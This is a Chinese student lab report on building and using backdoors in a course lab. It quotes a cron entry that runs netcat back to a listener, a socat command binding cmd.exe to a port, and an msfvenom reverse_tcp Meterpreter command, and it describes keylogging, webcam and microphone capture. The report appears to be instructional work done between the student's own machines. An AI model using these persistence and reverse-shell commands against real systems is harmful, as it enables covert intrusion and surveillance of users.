20232401 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/18 23:50:49/文章来源:https://www.cnblogs.com/qinghuanshili/p/19150140

20232401 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

  • 理解后门概念:不经过正常认证流程而访问系统的通道
  • 学习使用各类工具如netcat、socat、cron、MSF meterpreter等软件的使用方法
  • 掌握后门原理和构造、利用方法
  • 回答问题
    • (1)例举你能想到的一个后门进入到你系统中的可能方式?
      • 可能在用从不安全的渠道下载软件时,携带着后门的程序被一起捆绑安装至系统中。
    • (2)例举你知道的后门如何启动起来(win及linux)的方式?
      • 在windows系统中,首次启动可能是用户主动运行了带有后门的程序,被攻击者获取到了shell,后续攻击者可能会操纵被攻击系统设置定时任务或注册表自启动项,通过特定条件触发后门运行;
      • 在Linux系统中,可能是系统所提供的某项服务程序存在漏洞,被攻击者注入了shellcode,该程序在下一次运行中便可能触发运行后门。
    • (3)Meterpreter有哪些给你印象深刻的功能?
      • Meterpreter作为一个后渗透工具,令我印象最深刻的是它对于信息的获取能力以及相关功能,比如由keyscan_start和keyscan_dump组成的扫描周期,在这个周期里可以记录靶机的键盘输入,并且直接dump出输入的键,在特定情况下可以直接读取到用户的密码口令等敏感信息。还要screenshot、webcam_snap等都能直接读取到敏感信息。
    • (4)如何发现自己有系统有没有被安装后门?
      • 如下图,可以通过任务管理器查看是否存在异常进程,除此之外,也可以通过抓捕工具捕获从本机发出的包看是否有异常数据。
        image

2.实验过程

2.1 使用netcat获取主机操作Shell,cron启动某项任务

2.1.1 Windows获取Linux Shell

  • 首先在Windows终端使用ncat打开监听,如图:
    image

  • 然后在Linux中进行反弹连接
    26a60ebb6ec0cecffed1c256770ec660

  • 随后可以在Windows中使用Linux中命令,可以看到成功获取到Linux Shell
    3201723c84bf8180392acfbcddc2a02f

2.1.2 Linux获取Windows Shell

  • 首先在Linux终端用ncat打开监听
    image

  • 然后在Windows终端反弹连接
    24721a5d6fae68eb43232c99be6c3fc3

  • 随后可以在Linux中使用Windows命令,可以看到成功获取到Windows Shell
    0addc7b0b87c330cc9352bf80e3fa17b

2.1.3 在Linux通过cron定时启动反弹连接任务

  • 首先在Linux中通过cron命令进入编辑器,添加条目24 * * * * /bin/netcat WindowsIP 2401设置定时启动任务,在每小时的24分自动运行netcat进行反弹连接,期间Windows主机一直保持监听状态
    ff1b9674b1680c3c527a1cd038775147

  • 可以看到当24分到达后Linux主机成功启动了反弹连接任务,Windows主机获取到了Linux Shell
    8fe350cebcdcba3182566a7aff486a19

2.2 使用socat获取主机操作Shell,任务计划启动

  • 首先在Windows主机上的taskschd.msc任务计划程序中设置自启动任务,操作如图,设置socat锁屏后启动,其中socat.exe添加的参数为tcp-listen:2401 exec:cmd.exe,pty,stderr,作用是把cmd.exe绑定到端口2401,同时把cmd.exe的stderr重定向
    ef2f3287c22554a7c953c68f7116ea95
    ed5b3f1e52cb7b459a4b798f9a8732f8
    112901ad976c84f0daadad3fb4a586c9

  • 设置好任务计划后,在Linux主机中打开socat监听,如图:
    image

  • 此时在Windows主机中锁屏再打开,可以看到socat反向连接的任务已经启动
    496aa33eea1c928423a3b44496292b1f

  • 在Linux主机中成功获取到Shell
    c9a446eab1c67dcfeaeb92229335129e

2.3 使用MSF meterpreter生成可执行文件(后门),传送到主机并运行获取主机Shell

  • 首先使用msfvenom生成Windows Meterpreter,Meterpreter是一种高级后渗透payload,支持文件操作、屏幕截图、键盘记录等,操作命令是msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=2401 -f exe > 20232401_backdoor.exe,各参数意义如下:

    • -p参数:选取payload
    • LHOST:要回连的IP
    • LPORT:要使用的端口
    • -f参数:选取文件类型
  • 生成完毕后将可执行文件复制到共享文件夹中,通过共享文件夹传至Windows主机
    8d5402c5545da509e99c23e03cfca07e

  • Linux主机中打开控制台msfconsole,具体操作过程如下图
    image

  • 在Windows主机中点击运行后门文件,可以看到控制台成功拿到Shell
    image

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

  • 依旧是上一步生成的后门文件,在拿到Shell后进行以下尝试

    • record_mic:获取主机音频
    • webcam_snap:获取主机摄像头内容
    • keyscan_start & keyscan_dump:获取主机键入内容
    • screenshot:获取主机屏幕截图
  • 操作过程与结果如下图:
    9e6a79f9c373db9989dcfb1f4c394608
    f292c1a1b6ea1df4bf7e47394dc84490
    fe65a86ab4936a308cb89fe4c3a712b3

  • 尝试进行提权,前提是Windows是以管理员身份运行的后门文件,否则会因为权限不足而提权失败
    88e97c113296c19b180f6a261e95841a

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取到反弹连接Shell

  • 首先使用msfvenom的-x参数将payload注入到现有可执行文件里,生成新的具有后门的文件
    d1bdce177c4060ef806b75e527b6bd81

  • 随后打开msfconsole控制台,调整好相应参数,开始监听
    3eebc64c12bf21032beb512a4baa1c8b

  • 在另一终端中首先通过命令chmod +x命令赋予生成的后门文件执行权限,随后开始运行
    7e4b824349290de12ec51cd15b6731c9

  • 可以看到,后门文件被运行后,这边终端成功拿到shell
    d97e6b654509f451daa6edafbc1f1e57

3.问题及解决方案

  • 问题1:通过ncat传输后门文件至windows后无法运行
  • 问题1解决方案:通过对比文件大小,发现后门文件在经过ncat传输后发生了改变,于是使用共享文件夹进行传输,后门文件成功在Windows中运行
  • 问题2:在尝试控制主机摄像头进行摄像时失败
  • 问题2解决方案:经过问题查找,发现主机本身在硬件层面上关闭了摄像头功能,打开后仍能被攻击端远程控制
  • 问题3:提权失败
  • 问题3解决方案:经过资料查找发现是windows用户本身权限不够,以管理员身份运行后门文件即可,真实环境中可能利用普通Windows用户以更高权限再次反弹连接给出Shell

4.学习感悟、思考等

通过本次实验,笔者深刻感受到了后门程序的危害性,正常来说每个系统都有一道“门”,来抵御外界非法用户的访问,但后门就像在高墙下挖了一个洞,让攻击者可以悄悄的潜入系统内部。一旦某个系统被种下后门,那么这个系统可能就没有秘密可言了,因此对系统安全的工作人员来说,对系统后门的排查就显得尤为重要,这也是我们需要逐渐去了解掌握的。

参考资料

  • msfvenom完整使用指南
  • 0x21_MAL_后门原理与实践
  • ...

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/939846.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OI 笑传 #20

Yumebanchi我讨厌性质跟输入格式有关的东西。 20thARC208B 这题实现了三个版本,虽然说前两个是错的但是都是一遍写对,当练习玛丽了。 codeShow me the code #define rd read() #define mkp make_pair #define ls p&l…

FFT学习小结

关键词 多项式乘法,系数表示,点值表示,单位根 FFT基本思路系数表示->点值多项式 点值下直接相乘,时间复杂度O(n) 点值多项式->系数表示系数表示->点值多项式分治思想,奇偶分开,单位根 假定\(f(x)=\sum_…

2025.10.18——1黄

普及/提高- P14253 旅行(trip) CSP模拟赛T1,也是唯一AC的题。

幂等的双倍快乐,你值得拥有

hello, 这是有态度马甲的第xxx篇原创口水文。有趣指数5颗星,有用指数5颗星。 😠😠本文是国外技术网站medium上点赞超过200+的翻译/笔记文,有关规避/解决幂等请求的思路指南。 1. 软件领域二次请求无法避免 我们…

10.18总结

1.今天学习了数据模块化 2.明天用数据组完成数据整合

10.17总结

1.今天学习了如何转换数据格式 2.每天学习数据模块化

软考中级学习总结(2)

可靠性计算: (1)串联系统 R=R1R2R3......Rn (2)并联系统R=1-(1-R1)(1-R2).....(1-Rn) 编译程序和解释程序 1.低级语言:机器语言,汇编语言 2.高级语言:应用程序设计语言(java) 高级语言通过解释和编译后在机…

F - Not Adjacent

F - Not Adjacent Problem Statement You are given a length-$N$ integer sequence $A=(A _ 1,A _ 2,\ldots,A _ N)$. There are $2 ^ N$ (not necessarily contiguous) subsequences of $A$. Find how many subseque…

2025年粉末冶金制品/零件厂家推荐排行榜,高精度耐磨粉末冶金零件,优质粉末冶金制品公司推荐!

2025年粉末冶金制品/零件厂家推荐排行榜,高精度耐磨粉末冶金零件,优质粉末冶金制品公司推荐!一、行业背景介绍粉末冶金技术是一种先进的材料加工方法,通过将金属粉末或合金粉末经过压制和烧结等工艺,制备出具有特…

Neo4j 图数据库搭建和 Springboot 访问

Neo4j 图数据库主要用于节点关系的存储和查询,比传统关系型数据库的查询效率高,能够快速找到节点之间的最短路径,灵活强很强。 Neo4j 分为企业版和社区版,一般来说社区版免费,已经足够用了。有些功能只有企业版才…

AI元人文理论框架体系研究:价值原语化的文明演进机制与治理范式转变——声明Ai研究

AI元人文理论框架体系研究:价值原语化的文明演进机制与治理范式转变引言:AI元人文理论框架的兴起与核心问题1.1 理论背景与时代需求 在人工智能技术迅猛发展的2025年,人类社会正站在一个文明史的奇点上。通用人工智…

[buuctf]bjdctf_2020_router

首先查看一下文件的保护措施在用ida打开看一下 这里就是一个menu,然后进行选择,进入不同的函数这里主要注意到进入case1时,这里直接就有一个system函数,那么是否可以直接通过这个函数获得shell呢 在看看这里通过rea…

AtCoder Beginner Contest 428 ABCDE 题目解析

A - Grandmas Footsteps 题意 下课铃响起后,高桥会立即开始重复执行以下动作:以每秒 \(S\) 米的速度跑 \(A\) 秒,然后保持静止 \(B\) 秒。请问在下课铃响后 \(X\) 秒时,他总共跑了多少米? 思路 每 \(A+B\) 秒为一…

稻草火把下的星辰:回忆我的90年代求学路

1993年的夏天,我手握政和一中的录取通知书,却感觉这张纸比铅还重。中考成绩名列全校第一的喜悦,早已被无钱就读的现实冲刷得一干二净。在我们那个小村庄,考上高中并不被视为荣耀之事,唯有考上中专才被视为真正的“…

20251018

正睿 CSP 7 连测 终于 ak 了一场。 D 给定长度为 \(n(n \le 2 \times 10^5)\) 的序列 \(a(|a_i| \le 10^9)\)。若 \(a_i < 0\),\(b_i = -2^{-a_i}\);否则,\(b_i = 2^{a_i}\)。求 \(b\) 的最大子段和对 \(9982443…

Linux后门应急

Linux后门应急 1、主机后门用户名称:提交格式如:flag 进来先对终端升级一下 python -c import pty; pty.spawn("/bin/bash")直接使用cat /etc/passwd 查看后面用户flag{backdoor}2、主机排查项中可以发现到…

吴恩达深度学习课程一:神经网络和深度学习 第三周:浅层神经网络(二)

此分类用于记录吴恩达深度学习课程的学习笔记。 课程相关信息链接如下:原课程视频链接:[双语字幕]吴恩达深度学习deeplearning.ai github课程资料,含课件与笔记:吴恩达深度学习教学资料 课程配套练习(中英)与答案…

2025.10.18总结

今天继续学软考相关内容,看了操作系统一个章节进程管理的内容。 操作系统的定义:操作系统是指控制和管理整个计算机系统的硬件和软件资源,并合理地组织调度计算机的工作和资源的划分,以提供给用户和其他软件方便的…

C++动态多态原理分析

class Animal { public:void speak() {cout << "Animal.speak()" << endl;} };class Cat :public Animal {void speak() {cout << "Cat.speak()" << endl;} }; void doW…

Java基础——初识Math类,基本运算符,自增自减运算符,逻辑运算符,位运算符,三元运算符

Java基础——初识Math类,基本运算符,自增自减运算符,逻辑运算符,位运算符,三元运算符初识Math类 Math.pow(2,3); //运用工具类进行次方运算基本运算符 1.算术运算符:+,-,,/,%(此前为二元运算符),++,--(一…